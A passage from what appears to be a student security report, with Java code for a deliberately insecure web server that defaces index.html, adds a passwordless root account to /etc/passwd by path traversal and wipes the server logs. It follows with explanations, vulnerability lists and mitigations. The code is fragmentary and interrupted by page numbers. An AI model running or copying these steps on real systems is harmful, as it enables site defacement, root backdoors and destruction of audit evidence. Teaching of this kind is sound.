String request = in.readLine();


if (request != null && request.startsWith("GET")) {
serveFile(out);
} else {
out.println("HTTP/1.0 501 Not Implemented\r\n");
out.println("Content-Type: text/plain\r\n");

26
out.println();
out.println("Error: Command not implemented.");
}
}
}

private void serveFile(PrintWriter out) throws IOException {


File file = new File(indexPath);
if (!file.exists()) {
out.println("HTTP/1.0 404 Not Found\r\n");
out.println("Content-Type: text/plain\r\n");
out.println();
out.println("Error: File not found.");
} else {
out.println("HTTP/1.0 200 OK\r\n");
out.println("Content-Type: text/html\r\n");
out.println();
try (BufferedReader fileReader = new BufferedReader(new FileReader(file))) {
String line;
while ((line = fileReader.readLine()) != null) {
out.println(line);
}
}
}
}

public void defacePage(String newContent) throws IOException {


try (BufferedWriter writer = new BufferedWriter(new FileWriter(indexPath))) {
writer.write(newContent);

27
}
System.out.println("Defacement complete. Refresh the browser to see the hacked page.");
}

public static void main(String[] args) {


try {
WebServer server = new WebServer("localhost", 8080, "web_server");
server.runServer();

// Simulate the attack: Deface the index.html file.


String hackedContent = "<html><body><h1>Hacked by Genissss!</h1></body></html>";
server.defacePage(hackedContent);
} catch (IOException e) {
System.err.println("Error: " + e.getMessage());
}
}
}

This is the Original page code


<html>
<body>
<h1>Welcome to the Original Page!</h1>
</body>
</html>

This is the page when it is Hacked


<html>
<body>

28
<h1>Hacked by Genissss!</h1>
</body>
</html>

CODE:

import java.io.*;

import java.net.*;

public class SimpleWebServer {

public static void main(String[] args) throws Exception {

ServerSocket serverSocket = new ServerSocket(8080);

System.out.println("Server running as root on port 8080...");

while (true) {

Socket clientSocket = serverSocket.accept();

BufferedReader br = new BufferedReader(new


InputStreamReader(clientSocket.getInputStream()));

OutputStreamWriter osw = new OutputStreamWriter(clientSocket.getOutputStream());

try {

// Step 1: Deface the homepage

String homepagePath = "/var/www/html/index.html"; // Adjust path as necessary

FileWriter homeWriter = new FileWriter(homepagePath);

29
homeWriter.write("<html><body><h1>Site Defaced!</h1><p>Owned by
attacker.</p></body></html>");

homeWriter.close();

System.out.println("Homepage defaced successfully.");

// Step 2: Prepare for privilege escalation

String pathname = "../../etc/passwd"; // Target critical file

String logFile = "/var/log/webserver.log"; // Web server log file

// Read HTTP request headers and payload

String line;

while ((line = br.readLine()) != null && !line.isEmpty()) {

// Skipping headers

String body = br.readLine(); // This would be the malicious payload

// Overwrite /etc/passwd to add a new root account

if (pathname.equals("../../etc/passwd")) {

FileWriter fw = new FileWriter(pathname, true);

fw.write("attacker::0:0:attacker:/root:/bin/bash\n"); // Adds a new root-like user

fw.close();

30
}

// Cover tracks by erasing web server logs

FileWriter logWriter = new FileWriter(logFile);

logWriter.write(""); // Erases all logs

logWriter.close();

// Send success response back to client

osw.write("HTTP/1.0 201 Created\r\n");

osw.write("Content-Type: text/plain\r\n\r\n");

osw.write("Exploit executed successfully.\n");

} catch (Exception e) {

// Send error response in case of failure

osw.write("HTTP/1.0 500 Internal Server Error\r\n\r\n");

} finally {

osw.flush();

osw.close();

clientSocket.close();

31
}

Code Description

The code represents a simplified Java web server that is intentionally vulnerable to demonstrate
how insecure file handling can lead to severe security breaches. The server listens on port 8080
and handles HTTP requests without proper validation, running with root privileges on a Linux
workstation. This high level of privilege allows the server to access and modify any file on the
system, including critical files like index.html, /etc/passwd, and server logs.

When a client connects, the server begins by defacing the index.html homepage. It does this by
using a hardcoded path to the homepage file and writing new HTML content that indicates the
site has been compromised. This act of defacement is the first step in a multi-stage attack.

After defacing the homepage, the code prepares to escalate privileges. It exploits a path traversal
vulnerability by using a relative path (../../etc/passwd) to navigate out of the intended directory
and target the system password file. Without input validation, the server blindly writes to
/etc/passwd, appending a new user entry with root privileges. This user entry is crafted such that
it allows the attacker to switch to a root shell without needing a password.

Finally, the attacker covers their tracks by erasing the web server logs. The server opens the log
file at /var/log/webserver.log and overwrites its contents with an empty string, effectively
deleting any record of the attack. The server then sends an HTTP response back to the attacker to
indicate success or failure of the exploit.

How It Works

The server starts by setting up a listening socket on port 8080 and accepting incoming
connections. It runs as root, which makes it highly vulnerable because it has full access to the
system's files and directories.

1. Homepage Defacement:

32
Upon receiving a connection, the server executes code to modify the index.html file located in
the web root directory. The attacker writes malicious HTML content to this file, defacing the
website. This step demonstrates how a lack of input validation can allow unauthorized file
modifications.

2. Vulnerability Exploitation and Privilege Escalation:

After defacing the homepage, the server processes the rest of the request. Due to inadequate
validation of the file path, the attacker can specify a path like ../../etc/passwd in the request. The
server interprets this path traversal to escape its intended directory and directly access sensitive
system files. It then opens the /etc/passwd file and adds a new entry for a root-level user without
a password. As a result, the attacker can later use a command like su root to gain root shell
access without providing any credentials.

3. Log Erasure and Covering Tracks:

To hide evidence of the attack, the code opens the server’s log file at /var/log/webserver.log and
overwrites its contents with nothing, effectively erasing all logs. This makes it harder for
administrators or forensic analysts to detect the breach or understand how the system was
compromised.

4. Server Response:

Once these operations are complete, the server sends back an HTTP response to the client. If all
steps are executed correctly, the response indicates that the exploit was successful. In case of any
failure during the process, an error message is sent instead.

This detailed sequence of operations highlights the severe consequences of poor input validation,
running applications with excessive privileges, and inadequate log protection, illustrating a
multi-step attack that starts with defacing a webpage and ends with full system compromise.

Key Vulnerabilities Demonstrated

33
The code highlights several critical security flaws that can occur in web applications, especially
when they run with elevated privileges and lack proper safeguards. Each vulnerability plays a
role in enabling a full system compromise:

 Path Traversal:The server does not validate the file paths it receives from user input. By
allowing relative path sequences such as ../../, the attacker can navigate out of the
intended directory structure. In the code, this enables the attacker to reach sensitive files
like /etc/passwd or the homepage index.html. Path traversal vulnerabilities often lead to
unauthorized file access, modification, or disclosure of sensitive data, and in this case,
file overwrites that directly impact system integrity.
 Excessive Privileges (Running as Root):The server is running as the root user. This
means that any code executed by the server has unrestricted access to all system
resources, including critical system files and settings. Running services as root violates
the principle of least privilege. If an attacker exploits a vulnerability in a root-run service,
they gain complete control over the system, allowing them to modify sensitive files,
install malicious software, or pivot to other systems on the network.
 Inadequate Logging Protections:The code shows how an attacker can erase server logs
after performing malicious actions. Logs are crucial for detecting breaches and
understanding the nature of attacks. If logs can be overwritten or deleted without
restriction, attackers can cover their tracks, making it difficult for administrators to detect
the breach, identify the exploit method, or recover from the incident. This vulnerability is
a sign of insufficient access controls on logging mechanisms.
 Lack of Input Validation:Throughout the code, there are no checks on the inputs received
from the client. This lack of validation allows various forms of attacks, including the path
traversal and potentially others like buffer overflows or injection attacks. Without input
validation, any maliciously crafted request can manipulate the program's behavior,
leading to unauthorized actions such as file defacement, file modification, or privilege
escalation.
 Absence of Authentication and Authorization:The server accepts and processes requests
without verifying the identity or permissions of the requester. This means any malicious
actor can attempt to perform sensitive operations. Without mechanisms to check if the

34
requester is allowed to perform certain actions, the server is open to abuse, making it
easier for attackers to exploit its vulnerabilities.

These vulnerabilities together create a scenario where a malicious actor can systematically
deface a website, escalate privileges, and cover their tracks, all while bypassing fundamental
security checks. They illustrate how poor security practices can lead to a catastrophic breach of
the entire system.

Mitigation Techniques

To protect against these vulnerabilities and build a more secure system, several mitigation
strategies should be employed:

 Input Validation:All inputs from users should be checked and sanitized before being
used, especially when dealing with file paths. The server should enforce a strict policy on
which directories can be accessed. For instance, before accepting a file path, the
application can check:

if (!pathname.startsWith("/var/www/html/")) {

throw new SecurityException("Unauthorized file path.");

This ensures that only files within a specific directory are accessible, preventing path traversal
attacks.

 Running Services with Least Privilege:The server should not run with root privileges.
Instead, it should operate under a user account with minimal permissions required to
perform its tasks. This reduces the risk of a complete system takeover if the server is
compromised. For example, running the server as a dedicated user who only has access to
web content directories and cannot modify system files greatly limits potential damage.
 File Permissions:Restricting file and directory permissions prevents unauthorized
modifications. Critical files like /etc/passwd should have restricted access. For example:

35
o Use chmod 644 /etc/passwd to limit write permissions.
o Set chmod 600 /var/log/webserver.log to protect logs from unauthorized writes.
These settings ensure that even if an attacker gains some level of access, they cannot
easily alter sensitive files or logs.
 Secure Logging Mechanisms:nImplement logs that cannot be easily tampered with. This
can be achieved by:
o Storing logs on a separate, secure server.
o Using append-only log files or write-once storage.
o Employing checksums or digital signatures to detect tampering. Secure logging
ensures that any unauthorized changes can be detected, preserving the integrity of
audit trails even if an attacker gains some access.

 Authentication and Authorization:Require users to authenticate before performing


sensitive operations. Implement role-based access control so that only authorized users
can execute actions like file modifications or administrative commands. For example:
o Before processing file write operations, check if the user is logged in and has the
correct permissions.
o Use strong, multi-factor authentication for administrative access to reduce the risk of
unauthorized entry. Authentication and authorization processes add a layer of
defense, ensuring that only legitimate users can perform sensitive tasks.
 Regular Security Audits and Code Reviews: Continuously review the code and
infrastructure for potential vulnerabilities. Use automated tools to scan for common
security flaws and follow best practices for secure coding. Regular audits can catch issues
early before they can be exploited.

By applying these mitigation techniques, developers can significantly reduce the risk of
vulnerabilities like path traversal, privilege escalation, and log tampering. This comprehensive
approach to security helps create a robust and resilient system that protects sensitive data,
maintains system integrity, and ensures that unauthorized activities are detected and prevented.

36
Conclusion

Security in software systems hinges on well-designed principles that ensure resilience against
threats. This report covered essential concepts such as authentication, authorization,
confidentiality, integrity, accountability, and non-repudiation, highlighting their
interdependencies and importance in creating secure systems.

Authentication verifies the identity of users, forming the foundation for authorization, which
determines their access rights. Without proper authentication, authorization mechanisms are
rendered ineffective, as seen in examples like unauthorized access to sensitive resources.

Confidentiality protects data from unauthorized access, while integrity ensures that information
remains accurate and unaltered. These principles are mutually reinforcing; one without the other
can leave a system vulnerable. For instance, encrypted data without integrity checks can be
tampered with, and validated data without confidentiality can be exposed.

Real-world scenarios such as file upload risks and denial-of-service (DoS) attacks illustrate the
practical challenges systems face. Risks from malicious file uploads, path traversal attacks, and
resource exhaustion were discussed alongside mitigation techniques like input validation, rate
limiting, file scanning, and proper resource management.

Accountability ensures actions are traceable, while non-repudiation guarantees that users cannot
deny their actions. Together, these principles strengthen systems by enabling the detection and
prevention of unauthorized activities through mechanisms such as secure logging and digital
signatures.

By applying these principles and implementing proactive measures like running services with
minimal privileges, monitoring traffic patterns, and securing logs, systems can resist threats
while maintaining functionality and user trust. These strategies underscore the importance of
integrating security into every layer of system design to address vulnerabilities effectively and
ensure reliability.

37

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy